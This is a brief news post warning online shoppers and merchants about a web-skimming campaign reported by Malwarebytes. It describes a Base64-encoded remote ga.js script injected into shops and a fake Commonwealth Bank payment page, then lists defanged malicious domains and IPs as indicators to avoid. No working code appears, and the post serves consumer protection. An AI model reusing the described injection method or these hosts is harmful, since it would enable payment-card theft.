Beware of New Web Skimming Tactic


Online sellers and buyers are advised to be extra cautious when making transactions on the internet as web skimmers are at it again.

While eCommerce businesses and shoppers are busy preparing for the holidays, cybercriminals have found a new way to steal customers’ personal information like credit card details through a fraudulent payment service platform (PSP).

These skimmers would construct a page that looks exactly like a legit payments platform and wait for their unsuspecting victim to enter their payment details. Once they have collected the customer’s data, they are free to do whatever they wish to do with it.

Malware Attack via Phishing Site

A group of fraudsters that use a network of domain names to skim payment information on vulnerable sites was recently discovered by anti-malware software provider, Malwarebytes Labs.

credit cardAccording to the company, most of the domains were registered through the email address [email protected][.]com and come with a malicious ga.js file.

It further explained that the file is injected into compromised online shops by inserting a one-line piece of code containing the remote script in Base64 encoded form.

“One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js. However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.” – Malwarebytes Labs

The company was referring to a copycat of CommWeb, a payment gateway of Australia’s Commonwealth Bank, which targets an online store running on the PrestaShop eCommerce platform.

What’s alarming about the fraudulent site is its ability to validate the user’s information to make them think that they are indeed on a legit payments platform.

Don’t Be a Skimming Victim

The hackers did an excellent job at replicating the payments page of Commonwealth Bank’s website that no customer would have second thoughts about entering their payment details into the page.

Once the fake web page has obtained a customer’s information, the latter will be redirected to the real payment page and required to supply their payment information all over again, unaware that they have just been scammed.

To avoid falling victim to web skimming, always check the URL of the payments page you’re on, especially if you were redirected from a merchant’s site.

Also, make sure to take note of the following domains as they contain malware:

● payment-mastercard[.]com
● google-query[.]com
● google-analytics[.]top
● google-smart[.]com
● google-payment[.]com
● jquery-assets[.]com
● sagepay-live[.]com
● google-query[.]com
● payment-sagepay[.]com
● payment-worldpay[.]com
● 124.156.34[.]157
● 47.245.55[.]198
● 5.53.124[.]235

Have you ever been a victim of web skimming before?

Please head over to our Facebook Group for Small Business Sellers and interact with other small business owners.

Follow us on FacebookTwitter, and LinkedIn to stay up to date with relevant news and business insights for your online business.

Share on facebook
Share on twitter
Share on linkedin
Share on pinterest
Share on email